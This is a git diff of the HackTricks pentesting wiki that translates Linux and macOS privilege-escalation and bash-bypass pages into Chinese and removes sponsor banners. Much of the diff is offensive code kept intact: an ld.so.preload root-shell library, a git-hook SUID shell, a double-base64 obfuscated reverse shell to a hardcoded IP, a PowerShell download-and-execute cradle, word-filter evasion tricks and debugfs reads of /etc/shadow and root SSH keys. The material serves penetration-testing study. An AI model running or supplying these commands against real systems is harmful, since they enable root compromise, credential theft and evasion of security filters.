--rsh=COMMAND specify the remote shell to use +--rsync-path=PROGRAM specify the rsync to run on remote machine ``` ```bash touch "-e sh shell.sh" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(\_rsync \_attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +您可以利用这个 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(\_rsync \_attack)_\ +更多信息请参见 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## 7z -In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root: - +在 **7z** 中,即使在 `*` 前使用 `--`(注意 `--` 意味着后面的输入不能被视为参数,因此在这种情况下只是文件路径),您也可以导致任意错误以读取文件,因此如果以下命令由 root 执行: ```bash 7za a /backup/$filename.zip -t7z -snl -p$pass -- * ``` - -And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read: - +您可以在执行此操作的文件夹中创建文件,您可以创建文件 `@root.txt` 和文件 `root.txt`,后者是您想要读取的文件的 **symlink**: ```bash cd /path/to/7z/acting/folder touch @root.txt ln -s /file/you/want/to/read root.txt ``` +然后,当 **7z** 执行时,它会将 `root.txt` 视为一个包含它应该压缩的文件列表的文件(这就是 `@root.txt` 存在的意义),当 7z 读取 `root.txt` 时,它会读取 `/file/you/want/to/read`,**由于该文件的内容不是文件列表,它将抛出一个错误** 显示内容。 -Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. - -_More info in Write-ups of the box CTF from HackTheBox._ +_更多信息请参见 HackTheBox 的 CTF 盒子写作。_ ## Zip -**Execute arbitrary commands:** - +**执行任意命令:** ```bash zip name.zip files -T --unzip-command "sh -c whoami" ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md index 65f4bbafc..ed0fa876d 100644 --- a/src/linux-hardening/privilege-escalation/write-to-root.md +++ b/src/linux-hardening/privilege-escalation/write-to-root.md @@ -1,40 +1,36 @@ -# Arbitrary File Write to Root +# 任意文件写入根目录 {{#include ../../banners/hacktricks-training.md}} ### /etc/ld.so.preload -This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\ -If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary. - -For example: `echo "/tmp/pe.so" > /etc/ld.so.preload` +此文件的行为类似于 **`LD_PRELOAD`** 环境变量,但它也适用于 **SUID 二进制文件**。\ +如果您可以创建或修改它,您可以简单地添加一个 **将在每个执行的二进制文件中加载的库的路径**。 +例如:`echo "/tmp/pe.so" > /etc/ld.so.preload` ```c #include #include #include void _init() { - unlink("/etc/ld.so.preload"); - setgid(0); - setuid(0); - system("/bin/bash"); +unlink("/etc/ld.so.preload"); +setgid(0); +setuid(0); +system("/bin/bash"); } //cd /tmp //gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` - ### Git hooks -[**Git hooks**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are **scripts** that are **run** on various **events** in a git repository like when a commit is created, a merge... So if a **privileged script or user** is performing this actions frequently and it's possible to **write in the `.git` folder**, this can be used to **privesc**. - -For example, It's possible to **generate a script** in a git repo in **`.git/hooks`** so it's always executed when a new commit is created: +[**Git hooks**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) 是 **脚本**,在 git 仓库中的各种 **事件** 上 **运行**,例如当创建提交、合并时... 所以如果一个 **特权脚本或用户** 经常执行这些操作,并且可以 **写入 `.git` 文件夹**,这可以被用来 **privesc**。 +例如,可以在 git 仓库的 **`.git/hooks`** 中 **生成一个脚本**,以便在创建新提交时始终执行: ```bash echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit chmod +x pre-commit ``` - ### Cron & Time files TODO @@ -45,6 +41,6 @@ TODO ### binfmt_misc -The file located in `/proc/sys/fs/binfmt_misc` indicates which binary should execute whic type of files. TODO: check the requirements to abuse this to execute a rev shell when a common file type is open. +位于 `/proc/sys/fs/binfmt_misc` 的文件指示哪个二进制文件应该执行哪种类型的文件。TODO: 检查滥用此功能以在打开常见文件类型时执行反向 shell 的要求。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/useful-linux-commands/README.md b/src/linux-hardening/useful-linux-commands/README.md index f69d43525..f12bb1d77 100644 --- a/src/linux-hardening/useful-linux-commands/README.md +++ b/src/linux-hardening/useful-linux-commands/README.md @@ -1,17 +1,9 @@ -# Useful Linux Commands +# 有用的 Linux 命令 -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {{#include ../../banners/hacktricks-training.md}} -## Common Bash - +## 常见的 Bash ```bash #Exfiltration using Base64 base64 -w 0 file @@ -130,17 +122,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip 7z l file.zip ``` - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -## Bash for Windows - +## Windows 的 Bash ```bash #Base64 for Windows echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 @@ -160,9 +142,7 @@ python pyinstaller.py --onefile exploit.py #sudo apt-get install gcc-mingw-w64-i686 i686-mingw32msvc-gcc -o executable useradd.c ``` - ## Greps - ```bash #Extract emails from file grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt @@ -242,9 +222,7 @@ grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt #Extract ISBN Numbers egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt ``` - -## Find - +## 查找 ```bash # Find SUID set files. find / -perm /u=s -ls 2>/dev/null @@ -273,25 +251,19 @@ find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /p # Found Newer directory only and sort by time. (depth = 5) find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less ``` - -## Nmap search help - +## Nmap 搜索帮助 ```bash #Nmap scripts ((default or version) and smb)) nmap --script-help "(default or version) and *smb*" locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb nmap --script-help "(default or version) and smb)" ``` - ## Bash - ```bash #All bytes inside a file (except 0x20 and 0x00) for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done ``` - ## Iptables - ```bash #Delete curent rules and chains iptables --flush @@ -322,13 +294,4 @@ iptables -P INPUT DROP iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT ``` - {{#include ../../banners/hacktricks-training.md}} - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md index 5391e3c9d..0eef62f8a 100644 --- a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md +++ b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md @@ -1,27 +1,16 @@ -# Bypass Linux Restrictions +# 绕过 Linux 限制 {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -## Common Limitations Bypasses - -### Reverse Shell +## 常见限制绕过 +### 反向 Shell ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` - -### Short Rev shell - +### 短 Rev shell ```bash #Trick from Dikline #Get a rev shell with @@ -29,9 +18,7 @@ echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)| #Then get the out of the rev shell executing inside of it: exec >&0 ``` - -### Bypass Paths and forbidden words - +### 绕过路径和禁止词汇 ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping @@ -86,9 +73,7 @@ mi # This will throw an error whoa # This will throw an error !-1!-2 # This will execute whoami ``` - -### Bypass forbidden spaces - +### 绕过禁止的空格 ```bash # {form} {cat,lol.txt} # cat lol.txt @@ -121,22 +106,16 @@ g # These 4 lines will equal to ping $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined uname!-1\-a # This equals to uname -a ``` - -### Bypass backslash and slash - +### 绕过反斜杠和斜杠 ```bash cat ${HOME:0:1}etc${HOME:0:1}passwd cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd ``` - -### Bypass pipes - +### 绕过管道 ```bash bash<<<$(base64 -d<<g` in a file @@ -334,34 +295,25 @@ ln /f* 'sh x' 'sh g' ``` +## 只读/无执行/无发行版绕过 -## Read-Only/Noexec/Distroless Bypass - -If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:** +如果您在一个具有**只读和无执行保护**的文件系统中,甚至在一个无发行版容器中,仍然有方法可以**执行任意二进制文件,甚至是一个 shell!:** {{#ref}} ../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ {{#endref}} -## Chroot & other Jails Bypass +## Chroot 和其他监狱绕过 {{#ref}} ../privilege-escalation/escaping-from-limited-bash.md {{#endref}} -## References & More +## 参考资料与更多 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) - [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) - [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) - [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-unix/privilege-escalation/exploiting-yum.md b/src/linux-unix/privilege-escalation/exploiting-yum.md index c4bec532f..557fc1d51 100644 --- a/src/linux-unix/privilege-escalation/exploiting-yum.md +++ b/src/linux-unix/privilege-escalation/exploiting-yum.md @@ -1,25 +1,23 @@ {{#include ../../banners/hacktricks-training.md}} -Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/). +关于yum的更多示例可以在[gtfobins](https://gtfobins.github.io/gtfobins/yum/)上找到。 -# Executing arbitrary commands via RPM Packages +# 通过RPM包执行任意命令 -## Checking the Environment +## 检查环境 -In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root. +为了利用这个向量,用户必须能够以更高权限的用户执行yum命令,即root。 -### A working example of this vector +### 这个向量的一个有效示例 -A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com). +这个漏洞的有效示例可以在[tryhackme](https://tryhackme.com)的[daily bugle](https://tryhackme.com/room/dailybugle)房间中找到。 -## Packing an RPM +## 打包RPM -In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm). - -The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary. +在接下来的部分中,我将介绍如何使用[fpm](https://github.com/jordansissel/fpm)将反向shell打包到RPM中。 +下面的示例创建了一个包含任意脚本的安装前触发器的包,该脚本可以由攻击者定义。安装时,此包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示,但这可以根据需要进行更改。 ```text ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md index e790cd37d..a825854c1 100644 --- a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md +++ b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -1,18 +1,10 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %} - # Sudo/Admin Groups -## **PE - Method 1** - -**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines: +## **PE - 方法 1** +**有时**,**默认情况下(或因为某些软件需要它)**在 **/etc/sudoers** 文件中你可以找到一些这样的行: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL @@ -20,48 +12,35 @@ Get Access Today: # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +这意味着 **任何属于 sudo 或 admin 组的用户都可以以 sudo 身份执行任何操作**。 -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +如果是这种情况,要 **成为 root,你只需执行**: ```text sudo su ``` +## PE - 方法 2 -## PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +查找所有 suid 二进制文件,并检查是否存在二进制文件 **Pkexec**: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec. -Check the contents of: - +如果你发现二进制文件 pkexec 是一个 SUID 二进制文件,并且你属于 sudo 或 admin 组,你可能可以使用 pkexec 作为 sudo 执行二进制文件。检查以下内容: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +您将找到哪些组被允许执行 **pkexec**,并且在某些 Linux 中,**默认情况下**可能会出现一些 **sudo 或 admin** 组。 -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux can **appear** some of the groups **sudo or admin**. - -To **become root you can execute**: - +要 **成为 root,您可以执行**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +如果您尝试执行 **pkexec** 并且收到此 **错误**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` - -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - +**这不是因为你没有权限,而是因为你没有通过 GUI 连接**。对此问题有一个解决方法在这里: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。你需要 **2 个不同的 ssh 会话**: ```bash:session1 echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec @@ -72,39 +51,31 @@ pkexec "/bin/bash" #Step 3, execute pkexec pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` - # Wheel Group -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: - +**有时**,**默认情况下**在 **/etc/sudoers** 文件中可以找到这一行: ```text %wheel ALL=(ALL:ALL) ALL ``` +这意味着 **任何属于 wheel 组的用户都可以以 sudo 身份执行任何操作**。 -This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +如果是这样,要 **成为 root,你只需执行**: ```text sudo su ``` - # Shadow Group -Users from the **group shadow** can **read** the **/etc/shadow** file: - +来自 **group shadow** 的用户可以 **读取** **/etc/shadow** 文件: ```text -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +所以,阅读文件并尝试**破解一些哈希**。 -So, read the file and try to **crack some hashes**. +# 磁盘组 -# Disk Group - -This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +这个权限几乎**等同于根访问**,因为您可以访问机器内部的所有数据。 +文件:`/dev/sd[a-z][1-9]` ```text debugfs /dev/sda1 debugfs: cd /root @@ -112,70 +83,54 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +请注意,使用 debugfs 你也可以 **写入文件**。例如,要将 `/tmp/asd1.txt` 复制到 `/tmp/asd2.txt`,你可以这样做: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +然而,如果你尝试**写入由 root 拥有的文件**(如 `/etc/shadow` 或 `/etc/passwd`),你将会遇到“**权限被拒绝**”错误。 -However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error. - -# Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +# 视频组 +使用命令 `w` 你可以找到**谁已登录系统**,它将显示如下输出: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +**tty1** 表示用户 **yossi 物理上登录** 到机器上的一个终端。 -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +**video group** 有权限查看屏幕输出。基本上,你可以观察屏幕。为了做到这一点,你需要 **抓取当前屏幕上的图像** 的原始数据,并获取屏幕使用的分辨率。屏幕数据可以保存在 `/dev/fb0`,你可以在 `/sys/class/graphics/fb0/virtual_size` 找到该屏幕的分辨率。 ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: +要**打开** **原始图像**,您可以使用**GIMP**,选择**`screen.raw`**文件,并选择文件类型为**原始图像数据**: ![](../../images/image%20%28208%29.png) -Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): +然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个): ![](../../images/image%20%28295%29.png) # Root Group -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +看起来默认情况下**root组的成员**可以访问**修改**一些**服务**配置文件或一些**库**文件或**其他有趣的东西**,这些都可以用来提升权限... +**检查root成员可以修改哪些文件**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +# Docker 组 -# Docker Group - -You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. +您可以将主机的根文件系统挂载到实例的卷中,因此当实例启动时,它会立即加载一个 `chroot` 到该卷。这实际上使您在机器上获得了 root 权限。 {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -# lxc/lxd Group +# lxc/lxd 组 -[lxc - Privilege Escalation](lxd-privilege-escalation.md) - -
- -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %} +[lxc - 权限提升](lxd-privilege-escalation.md) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-auto-start-locations.md b/src/macos-hardening/macos-auto-start-locations.md index 5bfd0ae9a..90b0d575a 100644 --- a/src/macos-hardening/macos-auto-start-locations.md +++ b/src/macos-hardening/macos-auto-start-locations.md @@ -1,242 +1,229 @@ -# macOS Auto Start +# macOS 自动启动 {{#include ../banners/hacktricks-training.md}} -This section is heavily based on the blog series [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), the goal is to add **more Autostart Locations** (if possible), indicate **which techniques are still working** nowadays with latest version of macOS (13.4) and to specify the **permissions** needed. +本节主要基于博客系列 [**超越传统的 LaunchAgents**](https://theevilbit.github.io/beyond/),目标是添加 **更多自动启动位置**(如果可能),指明 **哪些技术在最新版本的 macOS(13.4)中仍然有效**,并指定所需的 **权限**。 -## Sandbox Bypass +## 沙盒绕过 > [!TIP] -> Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **waiting** for a very **common** **action**, a determined **amount of time** or an **action you can usually perform** from inside a sandbox without needing root permissions. +> 在这里您可以找到对 **沙盒绕过** 有用的启动位置,它允许您通过 **写入文件** 并 **等待** 一个非常 **常见** 的 **操作**、特定的 **时间** 或您通常可以在沙盒内执行的 **操作** 来简单地执行某些内容,而无需根权限。 ### Launchd -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC Bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### 位置 - **`/Library/LaunchAgents`** - - **Trigger**: Reboot - - Root required +- **触发**: 重启 +- 需要根权限 - **`/Library/LaunchDaemons`** - - **Trigger**: Reboot - - Root required +- **触发**: 重启 +- 需要根权限 - **`/System/Library/LaunchAgents`** - - **Trigger**: Reboot - - Root required +- **触发**: 重启 +- 需要根权限 - **`/System/Library/LaunchDaemons`** - - **Trigger**: Reboot - - Root required +- **触发**: 重启 +- 需要根权限 - **`~/Library/LaunchAgents`** - - **Trigger**: Relog-in +- **触发**: 重新登录 - **`~/Library/LaunchDemons`** - - **Trigger**: Relog-in +- **触发**: 重新登录 > [!TIP] -> As interesting fact, **`launchd`** has an embedded property list in a the Mach-o section `__Text.__config` which contains other well known services launchd must start. Moreover, these services can contain the `RequireSuccess`, `RequireRun` and `RebootOnSuccess` that means that they must be run and complete successfully. +> 有趣的是,**`launchd`** 在 Mach-o 部分 `__Text.__config` 中嵌入了一个属性列表,其中包含其他必须启动的知名服务。此外,这些服务可以包含 `RequireSuccess`、`RequireRun` 和 `RebootOnSuccess`,这意味着它们必须运行并成功完成。 > -> Ofc, It cannot be modified because of code signing. +> 当然,由于代码签名,它无法被修改。 -#### Description & Exploitation +#### 描述与利用 -**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in: +**`launchd`** 是 OX S 内核在启动时执行的 **第一个** **进程**,并且在关机时是最后一个完成的进程。它应该始终具有 **PID 1**。该进程将 **读取并执行** 在以下 **ASEP** **plist** 中指示的配置: -- `/Library/LaunchAgents`: Per-user agents installed by the admin -- `/Library/LaunchDaemons`: System-wide daemons installed by the admin -- `/System/Library/LaunchAgents`: Per-user agents provided by Apple. -- `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple. +- `/Library/LaunchAgents`: 管理员安装的每用户代理 +- `/Library/LaunchDaemons`: 管理员安装的系统范围守护进程 +- `/System/Library/LaunchAgents`: Apple 提供的每用户代理。 +- `/System/Library/LaunchDaemons`: Apple 提供的系统范围守护进程。 -When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**. - -The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** (as there are services like ssh that needs to be executed before any user access the system). Also agents may use GUI while daemons need to run in the background. +当用户登录时,位于 `/Users/$USER/Library/LaunchAgents` 和 `/Users/$USER/Library/LaunchDemons` 的 plist 将以 **登录用户的权限** 启动。 +**代理和守护进程之间的主要区别在于,代理在用户登录时加载,而守护进程在系统启动时加载**(因为有些服务如 ssh 需要在任何用户访问系统之前执行)。此外,代理可以使用 GUI,而守护进程需要在后台运行。 ```xml - Label - com.apple.someidentifier - ProgramArguments - - bash -c 'touch /tmp/launched' - - RunAtLoad - StartInterval - 800 - KeepAlive - - SuccessfulExit - - +Label +com.apple.someidentifier +ProgramArguments + +bash -c 'touch /tmp/launched' + +RunAtLoad +StartInterval +800 +KeepAlive + +SuccessfulExit + + ``` - -There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example). +在某些情况下,**代理需要在用户登录之前执行**,这些被称为**PreLoginAgents**。例如,这在登录时提供辅助技术是有用的。它们也可以在`/Library/LaunchAgents`中找到(请参见[**这里**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents)的示例)。 > [!NOTE] -> New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\ -> It's also possible to **unload** with `launchctl unload ` (the process pointed by it will be terminated), +> 新的守护进程或代理配置文件将在**下次重启后或使用**`launchctl load `**加载**。也可以使用`launchctl -F `加载没有该扩展名的.plist文件(但是这些plist文件在重启后不会自动加载)。\ +> 也可以使用`launchctl unload `进行**卸载**(指向的进程将被终止), > -> To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` - -List all the agents and daemons loaded by the current user: +> 要**确保**没有**任何**(如覆盖)**阻止**代理或守护进程**运行**,请运行:`sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` +列出当前用户加载的所有代理和守护进程: ```bash launchctl list ``` - > [!WARNING] -> If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks. +> 如果一个 plist 文件属于一个用户,即使它在守护进程的系统范围文件夹中,**任务将以用户身份执行**,而不是以 root 身份执行。这可以防止某些特权升级攻击。 -#### More info about launchd +#### 关于 launchd 的更多信息 -**`launchd`** is the **first** user mode process which is started from the **kernel**. The process start must be **successful** and it **cannot exit or crash**. It's even **protected** against some **killing signals**. +**`launchd`** 是从 **内核** 启动的 **第一个** 用户模式进程。进程启动必须是 **成功的**,并且 **不能退出或崩溃**。它甚至对某些 **杀死信号** 进行了 **保护**。 -One of the first things `launchd` would do is to **start** all the **daemons** like: +`launchd` 首先要做的事情之一是 **启动** 所有的 **守护进程**,例如: -- **Timer daemons** based on time to be executed: - - atd (`com.apple.atrun.plist`): Has a `StartInterval` of 30min - - crond (`com.apple.systemstats.daily.plist`): Has `StartCalendarInterval` to start at 00:15 -- **Network daemons** like: - - `org.cups.cups-lpd`: Listens in TCP (`SockType: stream`) with `SockServiceName: printer` - - SockServiceName must be either a port or a service from `/etc/services` - - `com.apple.xscertd.plist`: Listens on TCP in port 1640 -- **Path daemons** that are executed when a specified path changes: - - `com.apple.postfix.master`: Checking the path `/etc/postfix/aliases` -- **IOKit notifications daemons**: - - `com.apple.xartstorageremoted`: `"com.apple.iokit.matching" => { "com.apple.device-attach" 